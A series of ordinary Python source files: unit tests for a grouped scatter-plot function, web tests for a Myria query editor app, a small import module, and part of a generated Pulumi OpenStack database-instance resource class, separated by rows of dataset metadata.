cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight=[2],
fit=False, save_to='{}test_group_scatter_7'.format(self.save_path)))
def test_8_scatter_two_groups_highlight_one_scalar_num(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight=2,
save_to='{}test_group_scatter_8'.format(self.save_path)))
def test_9_scatter_two_groups_string_names_highlight_one(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = ['a'] * 100 + ['b'] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight=['b'],
save_to='{}test_group_scatter_9'.format(self.save_path)))
def test_10_scatter_three_groups_string_names_highlight_scalar_string(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 100 + ['b'] * 100 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight='bc',
save_to='{}test_group_scatter_10'.format(self.save_path)))
def test_11_scatter_three_groups_invalid_highlight_groups(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 100 + ['b'] * 100 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
highlight=['z', 'y', 'x'],
save_to='{}test_group_scatter_11'.format(self.save_path)))
def test_12_scatter_two_groups_no_boxplot_borders(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = ['a'] * 100 + ['b'] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
boxplot_borders=False,
save_to='{}test_group_scatter_12'.format(self.save_path)))
def test_13_scatter_two_groups_title(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = ['a'] * 100 + ['b'] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
title='Title Test', save_to='{}test_group_scatter_13'.format(self.save_path)))
def test_14_scatter_two_groups_labels(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = ['a'] * 100 + ['b'] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], xname='Test x',
yname='Test y', save_to='{}test_group_scatter_14'.format(self.save_path)))
def test_15_scatter_three_groups_auto_named(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 100 + ['b'] * 100 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'],
save_to='{}test_group_scatter_15'.format(self.save_path)))
def test_16_scatter_one_group_default(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
grp = ['a'] * 100
input_array = pd.DataFrame({'a': input_1_x, 'b': input_1_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_16'.format(self.save_path)))
def test_17_scatter_three_groups_vector_input_default(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 100 + ['b'] * 100 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = Vector(cs_x, other=cs_y, groups=grp)
self.assertTrue(GraphGroupScatter(input_array, save_to='{}test_group_scatter_17'.format(self.save_path)))
def test_18_scatter_three_groups_vector_input_highlight_one(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 100 + ['b'] * 100 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = Vector(cs_x, other=cs_y, groups=grp)
self.assertTrue(GraphGroupScatter(input_array, highlight=['b'],
save_to='{}test_group_scatter_18'.format(self.save_path)))
def test_19_scatter_one_group_matplotlib_bug(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=3)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
grp = ['a'] * 3
input_array = pd.DataFrame({'a': input_1_x, 'b': input_1_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_19'.format(self.save_path)))
def test_20_scatter_two_groups_matplotlib_bug(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=4)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 4 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_20'.format(self.save_path)))
def test_21_scatter_two_groups_unequal_x_and_y_size(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x if x > 0.0]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x if x > 0.0]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
self.assertRaises(UnequalVectorLengthError, lambda: GraphGroupScatter(cs_x, cs_y, groups=grp))
def test_22_scatter_two_groups_wrong_group_size(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1, 2]
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
self.assertRaises(UnequalVectorLengthError, lambda: GraphGroupScatter(cs_x, cs_y, groups=grp))
def test_23_no_data(self):
"""Test the case where there's no data."""
self.assertRaises(NoDataError, lambda: GraphGroupScatter([], []))
def test_24_scatter_three_groups_different_sizes(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=1)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=10)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 1 + ['b'] * 10 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_24'.format(self.save_path)))
def test_25_scatter_two_groups_no_ydata(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['a'] * 100 + ['b'] * 100 + ['c'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertRaises(AttributeError, lambda: GraphGroupScatter(input_array['a'], groups=input_array['c']))
def test_26_scatter_three_groups_long_group_names(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = ['11111111111111111111'] * 100 + ['222222222222222222222'] * 100 + ['3333333333333333333333'] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_26'.format(self.save_path)))
def test_27_scatter_two_groups_negative_corr(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [2 - (x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_27'.format(self.save_path)))
def test_28_scatter_two_groups_labels(self):
"""Test the case where labels are provided."""
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_labels_array = np.random.choice(list('ABCDE'), size=200)
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(
GraphGroupScatter(
input_array['a'],
input_array['b'],
groups=input_array['c'],
labels=input_labels_array,
highlight=['A'],
save_to='{}test_group_scatter_28'.format(self.save_path)
)
)
def test_29_scatter_two_groups_labels_and_group_highlight(self):
"""Test the case where labels and groups are highlighted."""
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_labels_array = np.random.choice(list('ABCDE'), size=220)
grp = [1] * 110 + [2] * 110
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
indicies_x = list(np.random.randint(0, 199, 20))
indicies_y = list(np.random.randint(0, 199, 20))
for i in indicies_x:
cs_x = np.insert(cs_x, i, np.nan, axis=0)
for i in indicies_y:
cs_y = np.insert(cs_y, i, np.nan, axis=0)
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(
GraphGroupScatter(
input_array['a'],
input_array['b'],
groups=input_array['c'],
labels=input_labels_array,
highlight=[1],
save_to='{}test_group_scatter_29'.format(self.save_path)
)
)
def test_30_groupscatter_dataframe(self):
"""Tests graphscater with dataframe input."""
np.random.seed(987654321)
df = pd.DataFrame(np.random.randn(100, 2), columns=list('xy'))
df['labels'] = np.random.choice(list('ABCDE'), len(df)).tolist()
df['groups'] = np.random.choice(list('XYZ'), len(df)).tolist()
self.assertTrue(
GraphGroupScatter(
df['x'],
df['y'],
groups=df['groups'],
labels=df['labels'],
highlight=['A'],
save_to='{}test_group_scatter_30'.format(self.save_path)
)
)
def test_31_groupscatter_labels_no_highlight(self):
"""Test the case where labels are given, but no highlights specified."""
np.random.seed(987654321)
df = pd.DataFrame(np.random.randn(100, 2), columns=list('xy'))
df['labels'] = np.random.choice(list('ABCDE'), len(df)).tolist()
df['groups'] = np.random.choice(list('XYZ'), len(df)).tolist()
self.assertTrue(
GraphGroupScatter(
df['x'],
df['y'],
groups=df['groups'],
labels=df['labels'],
save_to='{}test_group_scatter_31'.format(self.save_path)
)
)
def test_32_groupscatter_labels_invalid_labels_and_groups(self):
"""Test the case where all the highlights are not in groups or labels."""
np.random.seed(987654321)
df = pd.DataFrame(np.random.randn(100, 2), columns=list('xy'))
df['labels'] = np.random.choice(list('ABCDE'), len(df)).tolist()
df['groups'] = np.random.choice(list('XYZ'), len(df)).tolist()
self.assertTrue(
GraphGroupScatter(
df['x'],
df['y'],
groups=df['groups'],
labels=df['labels'],
highlight=['XX', 2, 34],
save_to='{}test_group_scatter_32'.format(self.save_path)
)
)
def test_33_groupscatter_labels_individual_highlight(self):
"""Test the case where individual points are highlighted with one overrunning."""
np.random.seed(987654321)
df = pd.DataFrame(np.random.randn(100, 2), columns=list('xy'))
df['labels'] = np.random.randint(10000, 50000, size=100)
df['groups'] = np.random.choice(list('XYZ'), len(df)).tolist()
self.assertTrue(
GraphGroupScatter(
df['x'],
df['y'],
groups=df['groups'],
labels=df['labels'],
highlight=df[df['x'] > 2]['labels'].tolist(),
save_to='{}test_group_scatter_33'.format(self.save_path)
)
)
def test_34_groupscatter_labels_individual_no_borders(self):
"""Test the case where individual points are highlighted with one overrunning and no boxplot borders."""
np.random.seed(987654321)
df = pd.DataFrame(np.random.randn(100, 2), columns=list('xy'))
df['labels'] = np.random.randint(10000, 50000, size=100)
df['groups'] = np.random.choice(list('XYZ'), len(df)).tolist()
self.assertTrue(
GraphGroupScatter(
df['x'],
df['y'],
boxplot_borders=False,
groups=df['groups'],
labels=df['labels'],
highlight=df[df['x'] > 2]['labels'].tolist(),
save_to='{}test_group_scatter_34'.format(self.save_path)
)
)
if __name__ == '__main__':
unittest.main()
| 52.92233
| 120
| 0.583636
| 4,416
| 27,255
| 3.324502
| 0.042799
| 0.057217
| 0.077243
| 0.061985
| 0.877733
| 0.848852
| 0.791704
| 0.765888
| 0.765888
| 0.765888
| 0
| 0.080473
| 0.259108
| 27,255
| 514
| 121
| 53.025292
| 0.646561
| 0.017685
| 0
| 0.708155
| 0
| 0
| 0.046087
| 0.028094
| 0
| 0
| 0
| 0
| 0.072961
| 1
| 0.075107
| false
| 0
| 0.019313
| 0
| 0.103004
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4e7c2e4e61d7c943710324f007049a67f028244
| 4,442
|
py
|
Python
|
appengine/test/test_myria_down.py
|
CSE512-15S/a3-haynesb-Pending
|
881c3872304f2cd796bd4db7211ab8c3f108586b
|
[
"Apache-2.0"
] | 2
|
2015-05-04T21:52:06.000Z
|
2015-07-25T05:53:27.000Z
|
appengine/test/test_myria_down.py
|
CSE512-15S/a3-haynesb-Pending
|
881c3872304f2cd796bd4db7211ab8c3f108586b
|
[
"Apache-2.0"
] | null | null | null |
appengine/test/test_myria_down.py
|
CSE512-15S/a3-haynesb-Pending
|
881c3872304f2cd796bd4db7211ab8c3f108586b
|
[
"Apache-2.0"
] | null | null | null |
from nose.tools import assert_equals
from webtest import TestApp
from myria_web_main import Application
app = TestApp(Application(hostname='fake.fake', port=12345))
def test_redirect():
response = app.get('/')
assert_equals(response.status_code, 301)
assert response.headers['Location']
assert response.headers['Location'].endswith('/editor')
def test_editor_loads():
response = app.get('/editor')
assert_equals(response.status_code, 200)
assert 'error connecting to fake.fake:12345' in str(response)
def test_queries_loads():
response = app.get('/queries')
assert_equals(response.status_code, 200)
assert 'error connecting to fake.fake:12345' in str(response)
def test_datasets_loads():
response = app.get('/datasets')
assert_equals(response.status_code, 200)
assert 'error connecting to fake.fake:12345' in str(response)
def test_datalog_logical():
params = {'language': 'datalog',
'query': 'A(x) :- R(x,3)'}
response = app.get('/plan', params)
assert_equals(response.status_code, 200)
assert 'Apply' in str(response)
response = app.get('/optimize', params)
assert_equals(response.status_code, 200)
assert 'MyriaApply' in str(response)
response = app.get('/compile', params)
assert_equals(response.status_code, 200)
assert_equals(params['query'], response.json['rawQuery'])
assert_equals(params['language'], response.json['language'])
def test_myrial():
params = {'language': 'myrial',
'query': '''R = Empty(x:int, y:int);
Ans = [FROM R WHERE y=3 EMIT x ];
STORE(Ans, justx);'''}
response = app.get('/plan', params)
assert_equals(response.status_code, 200)
assert 'Apply' in str(response)
response = app.get('/optimize', params)
assert_equals(response.status_code, 200)
assert 'MyriaApply' in str(response)
response = app.get('/compile', params)
assert_equals(response.status_code, 200)
assert response.json
assert_equals(params['query'], response.json['rawQuery'])
assert_equals(params['language'], response.json['language'])
def test_sql():
params = {'language': 'sql',
'query': '''R = Empty(x:int, y:int);
Ans = SELECT x FROM R WHERE y=3;
STORE(Ans, justx);'''}
response = app.get('/plan', params)
assert_equals(response.status_code, 200)
assert 'Apply' in str(response)
response = app.get('/optimize', params)
assert_equals(response.status_code, 200)
assert 'MyriaApply' in str(response)
response = app.get('/compile', params)
assert_equals(response.status_code, 200)
assert response.json
assert_equals(params['query'], response.json['rawQuery'])
assert_equals(params['language'], response.json['language'])
def test_dot_datalog():
# Datalog logical
params = {'language': 'datalog',
'type': 'logical',
'query': 'A(x) :- R(x,3)'}
response = app.get('/dot', params)
assert_equals(response.status_code, 200)
# .. physical
params['type'] = 'physical'
response = app.get('/dot', params)
assert_equals(response.status_code, 200)
def test_dot_myrial():
# Myrial logical
params = {'language': 'myrial',
'type': 'logical',
'query': '''R = Empty(x:int, y:int);
Ans = [FROM R WHERE y=3 EMIT x];
STORE(Ans, justx);'''}
response = app.get('/dot', params)
assert_equals(response.status_code, 200)
# .. physical
params['type'] = 'physical'
response = app.get('/dot', params)
assert_equals(response.status_code, 200)
def test_dot_sql():
# SQL logical
params = {'language': 'sql',
'type': 'logical',
'query': '''R = Empty(x:int, y:int);
Ans = SELECT x FROM R WHERE y=3;
STORE(Ans, justx);'''}
response = app.get('/dot', params)
assert_equals(response.status_code, 200)
# .. physical
params['type'] = 'physical'
response = app.get('/dot', params)
assert_equals(response.status_code, 200)
def test_datalog_execute():
params = {'language': 'datalog',
'query': 'A(x) :- R(x,3)'}
response = app.post('/execute', params, expect_errors=True)
assert_equals(response.status_code, 503)
| 32.188406
| 65
| 0.61909
| 536
| 4,442
| 5.001866
| 0.13806
| 0.12085
| 0.149198
| 0.193957
| 0.802313
| 0.761656
| 0.761656
| 0.761656
| 0.761656
| 0.757926
| 0
| 0.025506
| 0.232103
| 4,442
| 138
| 66
| 32.188406
| 0.760481
| 0.01756
| 0
| 0.764706
| 0
| 0
| 0.262965
| 0
| 0
| 0
| 0
| 0
| 0.392157
| 1
| 0.107843
| false
| 0
| 0.029412
| 0
| 0.137255
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f20c43028037a701a3e0a324301b2de33979da15
| 62
|
py
|
Python
|
tools/logger/trace_db/__init__.py
|
ti-simplelink/swol
|
331fd1096c643297505da010aff979f6c7baf02b
|
[
"BSD-3-Clause"
] | 5
|
2020-04-16T00:38:14.000Z
|
2022-02-10T12:47:14.000Z
|
tools/logger/trace_db/__init__.py
|
ti-simplelink/swol
|
331fd1096c643297505da010aff979f6c7baf02b
|
[
"BSD-3-Clause"
] | null | null | null |
tools/logger/trace_db/__init__.py
|
ti-simplelink/swol
|
331fd1096c643297505da010aff979f6c7baf02b
|
[
"BSD-3-Clause"
] | 1
|
2020-04-27T21:47:17.000Z
|
2020-04-27T21:47:17.000Z
|
from .trace_db import TraceDB
from .trace_db import ElfString
| 20.666667
| 31
| 0.83871
| 10
| 62
| 5
| 0.6
| 0.36
| 0.44
| 0.68
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 62
| 2
| 32
| 31
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f22561268d7ec47dce1fe6b7ed191e8d20ea53a7
| 28,251
|
py
|
Python
|
sdk/python/pulumi_openstack/database/instance.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 34
|
2018-09-12T12:37:51.000Z
|
2022-02-04T19:32:13.000Z
|
sdk/python/pulumi_openstack/database/instance.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 72
|
2018-08-15T13:04:57.000Z
|
2022-03-31T15:39:49.000Z
|
sdk/python/pulumi_openstack/database/instance.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 7
|
2019-03-14T08:28:49.000Z
|
2021-12-29T04:23:55.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['InstanceArgs', 'Instance']
@pulumi.input_type
class InstanceArgs:
def __init__(__self__, *,
datastore: pulumi.Input['InstanceDatastoreArgs'],
size: pulumi.Input[int],
configuration_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]]] = None,
flavor_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
networks: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]]] = None,
region: Optional[pulumi.Input[str]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]]] = None):
"""
The set of arguments for constructing a Instance resource.
:param pulumi.Input['InstanceDatastoreArgs'] datastore: An array of database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
:param pulumi.Input[int] size: Specifies the volume size in GB. Changing this creates new instance.
:param pulumi.Input[str] configuration_id: Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
:param pulumi.Input[Sequence[pulumi.Input['InstanceDatabaseArgs']]] databases: An array of database name, charset and collate. The database
object structure is documented below.
:param pulumi.Input[str] flavor_id: The flavor ID of the desired flavor for the instance.
Changing this creates new instance.
:param pulumi.Input[str] name: Database to be created on new instance. Changing this creates a
new instance.
:param pulumi.Input[Sequence[pulumi.Input['InstanceNetworkArgs']]] networks: An array of one or more networks to attach to the
instance. The network object structure is documented below. Changing this
creates a new instance.
:param pulumi.Input[str] region: The region in which to create the db instance. Changing this
creates a new instance.
:param pulumi.Input[Sequence[pulumi.Input['InstanceUserArgs']]] users: An array of username, password, host and databases. The user
object structure is documented below.
"""
pulumi.set(__self__, "datastore", datastore)
pulumi.set(__self__, "size", size)
if configuration_id is not None:
pulumi.set(__self__, "configuration_id", configuration_id)
if databases is not None:
pulumi.set(__self__, "databases", databases)
if flavor_id is not None:
pulumi.set(__self__, "flavor_id", flavor_id)
if name is not None:
pulumi.set(__self__, "name", name)
if networks is not None:
pulumi.set(__self__, "networks", networks)
if region is not None:
pulumi.set(__self__, "region", region)
if users is not None:
pulumi.set(__self__, "users", users)
@property
@pulumi.getter
def datastore(self) -> pulumi.Input['InstanceDatastoreArgs']:
"""
An array of database engine type and version. The datastore
object structure is documented below. Changing this creates a new instance.
"""
return pulumi.get(self, "datastore")
@datastore.setter
def datastore(self, value: pulumi.Input['InstanceDatastoreArgs']):
pulumi.set(self, "datastore", value)
@property
@pulumi.getter
def size(self) -> pulumi.Input[int]:
"""
Specifies the volume size in GB. Changing this creates new instance.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: pulumi.Input[int]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="configurationId")
def configuration_id(self) -> Optional[pulumi.Input[str]]:
"""
Configuration ID to be attached to the instance. Database instance
will be rebooted when configuration is detached.
"""
return pulumi.get(self, "configuration_id")
@configuration_id.setter
def configuration_id(self, value: Optional[pulumi.Input[str]]):
